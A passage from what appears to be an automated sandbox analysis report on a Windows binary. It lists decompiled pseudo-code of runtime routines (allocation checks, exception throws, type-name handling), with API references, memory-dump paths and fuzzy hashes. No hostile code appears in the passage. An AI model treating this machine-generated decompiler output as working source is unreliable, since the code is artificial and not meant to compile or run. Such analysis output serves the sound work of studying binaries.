                    												if(__eflags != 0) {
                    													goto L14;
                    												} else {
                    													goto L25;
                    												}
                    											} else {
                    												_t164 = _t151 + 0x23;
                    												__eflags = _t151 + 0x23 - _t151;
                    												if(__eflags <= 0) {
                    													L23:
                    													E013F3465(__eflags);
                    													goto L24;
                    												} else {
                    													_t164 = E013F21A5(__eflags, _t164);
                    													_t221 = _t221 + 4;
                    													__eflags = _t164;
                    													if(__eflags == 0) {
                    														L24:
                    														E013FDA71(_t160, _t164, _t186, __eflags);
                    														L25:
                    														E013FDA71(_t160, _t164, _t186, __eflags);
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														asm("int3");
                    														_t165 = _a8;
                    														_t89 = _a4;
                    														__eflags = _t165 - 0x3ffffff;
                    														if(__eflags > 0) {
                    															E013FDA71(_t160, _t165, _t186, __eflags);
                    															goto L35;
                    														} else {
                    															_t165 = _t165 << 6;
                    															__eflags = _t165 - 0x1000;
                    															if(_t165 < 0x1000) {
                    																L33:
                    																return L013CDA60(_t89);
                    															} else {
                    																__eflags = _t89 & 0x0000001f;
                    																if(__eflags != 0) {
                    																	L35:
                    																	E013FDA71(_t160, _t165, _t186, __eflags);
                    																	goto L36;
                    																} else {
                    																	_t165 =  *(_t89 - 4);
                    																	__eflags = _t165 - _t89;
                    																	if(__eflags >= 0) {
                    																		L36:
                    																		E013FDA71(_t160, _t165, _t186, __eflags);
                    																		goto L37;
                    																	} else {
                    																		_t149 = _t89 - _t165;
                    																		__eflags = _t149 - 4;
                    																		if(__eflags < 0) {
                    																			L37:
                    																			E013FDA71(_t160, _t165, _t186, __eflags);
                    																			goto L38;
                    																		} else {
                    																			__eflags = _t149 - 0x23;
                    																			if(__eflags > 0) {
                    																				L38:
                    																				E013FDA71(_t160, _t165, _t186, __eflags);
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				asm("int3");
                    																				_t95 = _a8;
                    																				_t166 = _a4;
                    																				__eflags = _t95 - 0x15555555;
                    																				if(__eflags > 0) {
                    																					E013FDA71(_t160, _t166, _t186, __eflags);
                    																					goto L48;
                    																				} else {
                    																					__eflags = _t95 + _t95 * 2 << 2 - 0x1000;
                    																					if(_t95 + _t95 * 2 << 2 < 0x1000) {
                    																						L46:
                    																						return L013CDA60(_t166);
                    																					} else {
                    																						__eflags = _t166 & 0x0000001f;
                    																						if(__eflags != 0) {
                    																							L48:
                    																							E013FDA71(_t160, _t166, _t186, __eflags);
                    																							goto L49;
                    																						} else {
                    																							_t147 =  *(_t166 - 4);
                    																							__eflags = _t147 - _t166;
                    																							if(__eflags >= 0) {
                    																								L49:
                    																								E013FDA71(_t160, _t166, _t186, __eflags);
                    																								goto L50;
                    																							} else {
                    																								_t166 = _t166 - _t147;
                    																								__eflags = _t166 - 4;
                    																								if(__eflags < 0) {
                    																									L50:
                    																									E013FDA71(_t160, _t166, _t186, __eflags);
                    																									goto L51;
                    																								} else {
                    																									__eflags = _t166 - 0x23;
                    																									if(__eflags > 0) {
                    																										L51:
                    																										E013FDA71(_t160, _t166, _t186, __eflags);
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										asm("int3");
                    																										_t101 = _a8;
                    																										_t167 = _a4;
                    																										__eflags = _t101 - 0xaaaaaaa;
                    																										if(__eflags > 0) {
                    																											E013FDA71(_t160, _t167, _t186, __eflags);
                    																											goto L61;
                    																										} else {
                    																											__eflags = _t101 + _t101 * 2 << 3 - 0x1000;
                    																											if(_t101 + _t101 * 2 << 3 < 0x1000) {
                    																												L59:
                    																												return L013CDA60(_t167);
                    																											} else {
                    																												__eflags = _t167 & 0x0000001f;
                    																												if(__eflags != 0) {
                    																													L61:
                    																													E013FDA71(_t160, _t167, _t186, __eflags);
                    																													goto L62;
                    																												} else {
                    																													_t143 =  *(_t167 - 4);
                    																													__eflags = _t143 - _t167;
                    																													if(__eflags >= 0) {
                    																														L62:
                    																														E013FDA71(_t160, _t167, _t186, __eflags);
                    																														goto L63;
                    																													} else {
                    																														_t167 = _t167 - _t143;
                    																														__eflags = _t167 - 4;
                    																														if(__eflags < 0) {
                    																															L63:
                    																															E013FDA71(_t160, _t167, _t186, __eflags);
                    																															goto L64;
                    																														} else {
                    																															__eflags = _t167 - 0x23;
                    																															if(__eflags > 0) {
                    																																L64:
                    																																E013FDA71(_t160, _t167, _t186, __eflags);
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																asm("int3");
                    																																_t218 = _t221;
                    																																_push(0xffffffff);
                    																																_push(E01418180);
                    																																_push( *[fs:0x0]);
                    																																_push(_t160);
                    																																_t108 =  *0x1435234; // 0x78d9f939
                    																																_push(_t108 ^ _t221);
                    																																 *[fs:0x0] =  &_v16;
                    																																_v20 = _t221 - 0x10;
                    																																_t161 = _t167;
                    																																_v32 = _t161;
                    																																_t168 =  *(_t161 + 4);
                    																																_t200 = _a4;
                    																																_t188 = _t168 -  *_t161;
                    																																_t112 = 0x2aaaaaab * _t188;
                    																																_t209 = (0x2aaaaaab * _t188 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t188 >> 0x20 >> 2);
                    																																_v28 = _t209;
                    																																__eflags = _t209 - _t200;
                    																																if(__eflags <= 0) {
                    																																	if(__eflags >= 0) {
                    																																		goto L71;
                    																																	} else {
                    																																		_t191 = _a8;
                    																																		__eflags = _t191 - _t168;
                    																																		if(_t191 >= _t168) {
                    																																			L76:
                    																																			__eflags = _t200 - _t209;
                    																																			E013EC250(_t161, _t161, _t209, _t218, _t200 - _t209);
                    																																		} else {
                    																																			_t129 =  *_t161;
                    																																			__eflags = _t129 - _t191;
                    																																			if(_t129 > _t191) {
                    																																				goto L76;
                    																																			} else {
                    																																				_t215 = (0x2aaaaaab * (_t191 - _t129) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t191 - _t129) >> 0x20 >> 2);
                    																																				E013EC250(_t161, _t161, _t215, _t218, _t200 - _v28);
                    																																				_a8 =  *_t161 + (_t215 + _t215 * 2) * 8;
                    																																			}
                    																																		}
                    																																		_push(_a8);
                    																																		_v8 = 0;
                    																																		_push(_t161);
                    																																		E013EABB0( *(_t161 + 4), _t200 - (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2), _a8);
                    																																		_t128 = _t200 - (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2) + (_t200 - (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t161 + 4) -  *_t161) >> 0x20 >> 2)) * 2 << 3;
                    																																		_t76 = _t161 + 4;
                    																																		 *_t76 =  *(_t161 + 4) + _t128;
                    																																		__eflags =  *_t76;
                    																																		 *[fs:0x0] = _v16;
                    																																		return _t128;
                    																																	}
                    																																} else {
                    																																	_t112 = _t168 + (_t200 - _t209 + (_t200 - _t209) * 2) * 8;
                    																																	_a8 = _t112;
                    																																	_t216 = _t112;
                    																																	__eflags = _t112 - _t168;
                    																																	if(_t112 != _t168) {
                    																																		_t205 = _t168;
                    																																		do {
                    																																			 *((intOrPtr*)( *_t216))(0);
                    																																			_t216 = _t216 + 0x18;
                    																																			__eflags = _t216 - _t205;
                    																																		} while (_t216 != _t205);
                    																																		_t112 = _a8;
                    																																	}
                    																																	 *(_t161 + 4) = _t112;
                    																																	L71:
                    																																	 *[fs:0x0] = _v16;
                    																																	return _t112;
                    																																}
                    																															} else {
                    																																_t167 = _t143;
                    																																goto L59;
                    																															}
                    																														}
                    																													}
                    																												}
                    																											}
                    																										}
                    																									} else {
                    																										_t166 = _t147;
                    																										goto L46;
                    																									}
                    																								}
                    																							}
                    																						}
                    																					}
                    																				}
                    																			} else {
                    																				_t89 = _t165;
                    																				goto L33;
                    																			}
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t154 = _t164 + 0x00000023 & 0xffffffe0;
                    														__eflags = _t154;
                    														 *(_t154 - 4) = _t164;
                    														return _t154;
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										L14:
                    										return _t84;
                    									}
                    								} else {
                    									_t5 = _t164 + 0x23; // 0x23
                    									_t159 = _t5 & 0xffffffe0;
                    									__eflags = _t159;
                    									 *(_t159 - 4) = _t164;
                    									return _t159;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					return _t79;
                    				}
                    			}
                    0x013ec64f
                    0x013ec659
                    0x013ec65b
                    0x013ec65e
                    0x013ec660
                    0x013ec69e
                    0x00000000
                    0x013ec6a0
                    0x013ec6a0
                    0x013ec6a3
                    0x013ec6a5
                    0x013ec6da
                    0x013ec6de
                    0x013ec6e1
                    0x013ec6a7
                    0x013ec6a7
                    0x013ec6a9
                    0x013ec6ab
                    0x00000000
                    0x013ec6ad
                    0x013ec6c6
                    0x013ec6c8
                    0x013ec6d5
                    0x013ec6d5
                    0x013ec6ab
                    0x013ec6ee
                    0x013ec6f3
                    0x013ec6fe
                    0x013ec712
                    0x013ec735
                    0x013ec738
                    0x013ec738
                    0x013ec738
                    0x013ec73e
                    0x013ec74c
                    0x013ec74c
                    0x013ec662
                    0x013ec667
                    0x013ec66a
                    0x013ec66d
                    0x013ec66f
                    0x013ec671
                    0x013ec673
                    0x013ec675
                    0x013ec67b
                    0x013ec67d
                    0x013ec680
                    0x013ec680
                    0x013ec684
                    0x013ec684
                    0x013ec687
                    0x013ec68a
                    0x013ec68d
                    0x013ec69b
                    0x013ec69b
                    0x013ec5e4
                    0x013ec5e4
                    0x00000000
                    0x013ec5e4
                    0x013ec5e2
                    0x013ec5dd
                    0x013ec5d6
                    0x013ec5cf
                    0x013ec5ca
                    0x013ec584
                    0x013ec584
                    0x00000000
                    0x013ec584
                    0x013ec582
                    0x013ec57d
                    0x013ec576
                    0x013ec56f
                    0x013ec56a
                    0x013ec522
                    0x013ec522
                    0x00000000
                    0x013ec522
                    0x013ec520
                    0x013ec51b
                    0x013ec514
                    0x013ec50d
                    0x013ec509
                    0x013ec4b5
                    0x013ec4b8
                    0x013ec4b8
                    0x013ec4bb
                    0x013ec4be
                    0x013ec4be
                    0x013ec4b3
                    0x013ec4a4
                    0x013ec49d
                    0x013ec488
                    0x013ec488
                    0x013ec488
                    0x013ec488
                    0x013ec445
                    0x013ec445
                    0x013ec448
                    0x013ec448
                    0x013ec44b
                    0x013ec44e
                    0x013ec44e
                    0x013ec443
                    0x013ec434
                    0x013ec42d
                    0x013ec418
                    0x013ec418
                    0x013ec418
                    0x013ec418

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 39272d70cb43e55991b45e1f78c67d3d5abb7d5e465461f8b86871d7cc4eb833
                    • Instruction ID: 8470b755640b0a48a2539e2067664224f3065be7f8733da4c1ead4818cdd26e9
                    • Opcode Fuzzy Hash: 39272d70cb43e55991b45e1f78c67d3d5abb7d5e465461f8b86871d7cc4eb833
                    • Instruction Fuzzy Hash: 88F027F694032646FB27EB7C844CA3E72C85E7029D700117DE726E2095EF38C8548926
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013F7826() {
                    				signed int _t9;
                    
                    				E013F7B49();
                    				E013F7ADD();
                    				_t9 = E013FD6BE();
                    				 *((intOrPtr*)(_t9 + _t9 * 8 - 0x3fcdfc8b)) =  *((intOrPtr*)(_t9 + _t9 * 8 - 0x3fcdfc8b)) + _t9;
                    			}

                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 013F7826
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 013F782B
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 013F7830
                      • Part of subcall function 013FD6BE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 013FD6CF
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 013F7845
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 8f9118350c77b1a4c46988e2bee8df409da24fc8d7b626b4330c93c09092b791
                    • Instruction ID: 557c7848d637c0dc7716842221d341d6eeb20f02262558ffca5f4f4f9e21c6fc
                    • Opcode Fuzzy Hash: 8f9118350c77b1a4c46988e2bee8df409da24fc8d7b626b4330c93c09092b791
                    • Instruction Fuzzy Hash: B7C04C0400428750DC913EFC65066AD77044C726DCFD024EECB54176439D06080FD273
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 01402DED
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: 33c130e1e94e0b234257d54587a2fd4734dc559622fba161115b7737dad07b90
                    • Instruction ID: 006c61055f86c3faad33cc95db80cc875d38223d8e0bb0828c8aa32645c39c5f
                    • Opcode Fuzzy Hash: 33c130e1e94e0b234257d54587a2fd4734dc559622fba161115b7737dad07b90
                    • Instruction Fuzzy Hash: 1E518B71A14502D6EB237B1BC98476B2B949B50710F208EBFE0C5823F9DA7488D29B86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E013CFBF0(void* __ecx, intOrPtr* _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				intOrPtr _v64;
                    				char _v68;
                    				char _v84;
                    				void* _v88;
                    				char _v92;
                    				char _v96;
                    				char _v104;
                    				char _v108;
                    				char _v112;
                    				void* __ebp;
                    				signed int _t44;
                    				signed int _t45;
                    				char _t49;
                    				void* _t57;
                    				char _t78;
                    				void* _t79;
                    				void* _t80;
                    				void* _t84;
                    				void* _t85;
                    				signed int _t87;
                    
                    				_t44 =  *0x1435234; // 0x78d9f939
                    				_t45 = _t44 ^ _t87;
                    				_v20 = _t45;
                    				 *[fs:0x0] =  &_v16;
                    				_t80 = __ecx;
                    				_v96 = 0xffffffff;
                    				_v92 = 0;
                    				_v88 = 0;
                    				_v108 = 0;
                    				_v104 = 0;
                    				_v112 = 0;
                    				_v8 = 3;
                    				_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_a4 + 4))))("InputBuffer", 0x1435f20,  &_v112, _t45, _t79, _t84,  *[fs:0x0], E01416B36, 0xffffffff);
                    				_t92 = _t49;
                    				if(_t49 == 0) {
                    					_v64 = 0xf;
                    					_v68 = 0;
                    					_v84 = _t49;
                    					E013C64B7( &_v84, _t92, "StringStore: missing InputBuffer argument", 0x29);
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 5;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44,  &_v112,  &_v84, 0, 0xffffffff);
                    					_v8 = 4;
                    					_v60 = 0x141a97c;
                    					E013F4EC6( &_v60, 0x1430adc);
                    				}
                    				_t85 = _v88;
                    				_t78 = _v92;
                    				_t51 =  !=  ? _t85 : _v108;
                    				 *((intOrPtr*)(_t80 + 0x14)) =  !=  ? _t85 : _v108;
                    				_t53 =  !=  ? _t78 : _v104;
                    				 *((intOrPtr*)(_t80 + 0x1c)) = 0;
                    				 *((intOrPtr*)(_t80 + 0x18)) =  !=  ? _t78 : _v104;
                    				_v8 = 6;
                    				_t68 =  >=  ?  &_v92 :  &_v96;
                    				_t69 =  *( >=  ?  &_v92 :  &_v96);
                    				memset(_t85, 0,  *( >=  ?  &_v92 :  &_v96) << 0);
                    				_t57 = L013CDA60(_t85);
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t57, _v20 ^ _t87);
                    			}

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CFCD6
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • StringStore: missing InputBuffer argument, xrefs: 013CFC68
                    • InputBuffer, xrefs: 013CFC51
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrow
                    • String ID: InputBuffer$StringStore: missing InputBuffer argument
                    • API String ID: 3976011213-2380213735
                    • Opcode ID: 0742f128a883ae7c55e51f8b1c436f5a67622528310fd416eb75b0bfe1be8fe9
                    • Instruction ID: 1b50ffc5c463838e91b1f8faec151354d925ee076a39ae8b0a6615bb1478250c
                    • Opcode Fuzzy Hash: 0742f128a883ae7c55e51f8b1c436f5a67622528310fd416eb75b0bfe1be8fe9
                    • Instruction Fuzzy Hash: AE4118B0E04289EBDB00CF99D954BDEBBF4AF59714F20421EE415AB384D7B55A48CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 61%
                    			E013E8060(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, void* _a16) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v60;
                    				char _v84;
                    				char _v108;
                    				char _v132;
                    				char _v156;
                    				char _v180;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t30;
                    				signed int _t31;
                    				void* _t44;
                    				void* _t46;
                    				void* _t48;
                    				void* _t50;
                    				void* _t73;
                    				intOrPtr _t76;
                    				signed int _t79;
                    
                    				_push(0xffffffff);
                    				_push(E014178FE);
                    				_push( *[fs:0x0]);
                    				_t30 =  *0x1435234; // 0x78d9f939
                    				_t31 = _t30 ^ _t79;
                    				_v20 = _t31;
                    				_push(_t31);
                    				 *[fs:0x0] =  &_v16;
                    				_t73 = __ecx;
                    				_t76 = _a4;
                    				if( *((char*)(__ecx + 8)) == 0) {
                    					E013D2390();
                    					_push( &_v180);
                    					_push(0x14380c8);
                    					_push(_t76);
                    					_v8 = 0;
                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) + 4))))() == 0) {
                    						_t44 = E013C2AD0( &_v84, E013F4DFB(__ecx, 0x1437448, 0x1439f60));
                    						_v8 = 1;
                    						_t46 = E013C1DF7(__ebx,  &_v84,  &_v180,  &_v108, _t44, ": Missing required parameter \'");
                    						_v8 = 2;
                    						_t48 = E013C1DF7(__ebx,  &_v84,  &_v180,  &_v132, _t46, _t76);
                    						_v8 = 3;
                    						_t50 = E013C1DF7(__ebx,  &_v84,  &_v180,  &_v156, _t48, 0x141a9b4);
                    						_v8 = 4;
                    						E013CB190(_t50);
                    						E013F4EC6( &_v60, 0x1430adc);
                    					}
                    					_a8( &_v180);
                    					E013C3D26( &_v180);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t73, _v20 ^ _t79);
                    			}

                    APIs
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E80D3
                      • Part of subcall function 013F4DFB: ___unDName.LIBVCRUNTIME ref: 013F4E2E
                      • Part of subcall function 013F4DFB: InterlockedPushEntrySList.KERNEL32(?,?,?,?,01439F60,?,?,?,?,00000000,?), ref: 013F4EA2
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EAF
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EB7
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E8135
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • : Missing required parameter ', xrefs: 013E80E4
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$EntryExceptionException@8InterlockedListNamePushRaiseThrow___std_type_info_name___un
                    • String ID: : Missing required parameter '
                    • API String ID: 1968048711-3540594642
                    • Opcode ID: 6173724c61c2c93aca8c4b32a1e1355046412f9c993f9df8d12eb5ca46510608
                    • Instruction ID: cbed5ede18fa1e978674468f1e704a6247133aefc8c6b1393a0985b6890b6525
                    • Opcode Fuzzy Hash: 6173724c61c2c93aca8c4b32a1e1355046412f9c993f9df8d12eb5ca46510608
                    • Instruction Fuzzy Hash: 9231927190034AAFCB11DBA9CC54FEFB7B8EF59618F14459EE405A7241DB74AA04CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E013E8650(intOrPtr* __ecx, void* __edx) {
                    				void* __ebx;
                    				void* __edi;
                    				signed int _t19;
                    				signed int _t20;
                    				intOrPtr* _t26;
                    				void* _t27;
                    				signed int _t28;
                    				void* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t33;
                    				intOrPtr* _t37;
                    				signed int _t38;
                    				void* _t41;
                    				intOrPtr _t42;
                    				void* _t43;
                    				intOrPtr _t45;
                    				intOrPtr* _t47;
                    				void* _t48;
                    
                    				_t41 = __edx;
                    				_t31 = __ecx;
                    				_t52 =  *((char*)(__ecx + 0x11));
                    				if( *((char*)(__ecx + 0x11)) == 0) {
                    					L7:
                    					if( *((char*)(_t31 + 0x10)) != 0 || E013FF910( *((intOrPtr*)(_t31 + 4)), "ThisObject:", 0xb) != 0) {
                    						L18:
                    						return _t31;
                    					} else {
                    						_t19 = E013F4DFB(_t43, 0x1437448, 0x1439f60);
                    						_t45 =  *((intOrPtr*)(_t31 + 4));
                    						_t33 = _t45 + 0xb;
                    						while(1) {
                    							_t42 =  *_t33;
                    							if(_t42 !=  *_t19) {
                    								break;
                    							}
                    							if(_t42 == 0) {
                    								L14:
                    								_t20 = 0;
                    								L16:
                    								_t60 = _t20;
                    								if(_t20 == 0) {
                    									_push( *((intOrPtr*)(_t31 + 8)));
                    									_push(0x1437444);
                    									_push(_t45);
                    									E013C56E5(_t31, _t42, _t60);
                    									E013D2BA0( *((intOrPtr*)(_t31 + 0xc)) + 0xc,  *_t31 + 0xc);
                    									E013D2BA0( *((intOrPtr*)(_t31 + 0xc)) + 0x24,  *_t31 + 0x24);
                    									 *((char*)(_t31 + 0x10)) = 1;
                    								}
                    								goto L18;
                    							}
                    							_t42 =  *((intOrPtr*)(_t33 + 1));
                    							if(_t42 !=  *((intOrPtr*)(_t19 + 1))) {
                    								break;
                    							}
                    							_t33 = _t33 + 2;
                    							_t19 = _t19 + 2;
                    							if(_t42 != 0) {
                    								continue;
                    							}
                    							goto L14;
                    						}
                    						asm("sbb eax, eax");
                    						_t20 = _t19 | 0x00000001;
                    						__eflags = _t20;
                    						goto L16;
                    					}
                    				}
                    				_t26 = E013F4DFB(_t43, 0x1437448, 0x1439f60);
                    				_t48 = _t48 + 8;
                    				_t47 = _t26;
                    				_push(0xb);
                    				_t27 = E013C6330(_t31,  *((intOrPtr*)(_t31 + 0xc)), _t52, "ThisObject:");
                    				_t53 =  *_t47;
                    				_t43 = _t27;
                    				if( *_t47 != 0) {
                    					_t37 = _t47;
                    					_t3 = _t37 + 1; // 0x1
                    					_t41 = _t3;
                    					do {
                    						_t28 =  *_t37;
                    						_t37 = _t37 + 1;
                    						__eflags = _t28;
                    					} while (_t28 != 0);
                    					_t38 = _t37 - _t41;
                    					__eflags = _t38;
                    					L6:
                    					_push(_t38);
                    					_t29 = E013C6330(_t31, _t43, _t53, _t47);
                    					_push(0x3b);
                    					E013C6296(_t31, _t29, _t41, _t43, 1);
                    					goto L7;
                    				}
                    				_t38 = 0;
                    				goto L6;
                    			}

                    APIs
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E8665
                      • Part of subcall function 013F4DFB: ___unDName.LIBVCRUNTIME ref: 013F4E2E
                      • Part of subcall function 013F4DFB: InterlockedPushEntrySList.KERNEL32(?,?,?,?,01439F60,?,?,?,?,00000000,?), ref: 013F4EA2
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EAF
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EB7
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E86D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ___std_type_info_name_free$EntryInterlockedListNamePush___un
                    • String ID: ThisObject:
                    • API String ID: 2562688937-1543776615
                    • Opcode ID: 9044a3bd590dbfe731712603bc63f00b15b7d08ea1335a45fa88dedf30da86ea
                    • Instruction ID: f61c2c3922198f976a495dc137bb177cc36d7b6ec5e4513418e75531f1bc4341
                    • Opcode Fuzzy Hash: 9044a3bd590dbfe731712603bc63f00b15b7d08ea1335a45fa88dedf30da86ea
                    • Instruction Fuzzy Hash: 87218B71A403116BDB165E3CDCAABB33B895F9121CF1844ECD9859B2C3E7A2E919C360
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140F312(void* __ecx, signed int _a4, intOrPtr _a8) {
                    				int _v8;
                    				int _t15;
                    				int _t16;
                    				signed int _t17;
                    				signed int _t23;
                    				signed int _t25;
